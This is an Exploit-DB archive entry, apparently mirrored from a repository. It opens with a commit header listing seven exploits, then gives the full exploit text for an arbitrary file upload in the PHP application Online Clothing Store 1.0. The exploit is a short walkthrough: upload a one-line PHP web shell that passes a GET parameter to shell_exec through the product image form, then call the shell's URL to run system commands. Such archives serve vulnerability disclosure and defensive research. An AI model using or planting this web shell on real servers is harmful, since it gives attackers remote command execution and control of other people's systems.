exploit-db-mirror/exploits/php/webapps/48438.txt
Offensive Security c1eb769a98 DB: 2020-05-08
7 changes to exploits/shellcodes

FlashGet 1.9.6 - Denial of Service (PoC)
Car Park Management System 1.0 - Authentication Bypass
Draytek VigorAP 1000C - Persistent Cross-Site Scripting
School File Management System 1.0  - 'username' SQL Injection
Online Clothing Store 1.0 - Arbitrary File Upload
Pisay Online E-Learning System 1.0 - Remote Code Execution
Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection
2020-05-08 05:01:51 +00:00

22 lines
No EOL
819 B
Text

# Exploit Title: Online Clothing Store 1.0 - Arbitrary File Upload
# Date: 2020-05-05
# Exploit Author: Sushant Kamble and Saurav Shukla
# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
#Vulnerable Page: Products.php
#Exploit
Open Products.php and select any product
Fill details
Create php shell code with below script
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
Click on upload Image
Select php file
Click Submet
Access below URL:
http://localhost/online%20Clothing%20Store/Products/shell.php?e=dir
add system commands after e to execute it.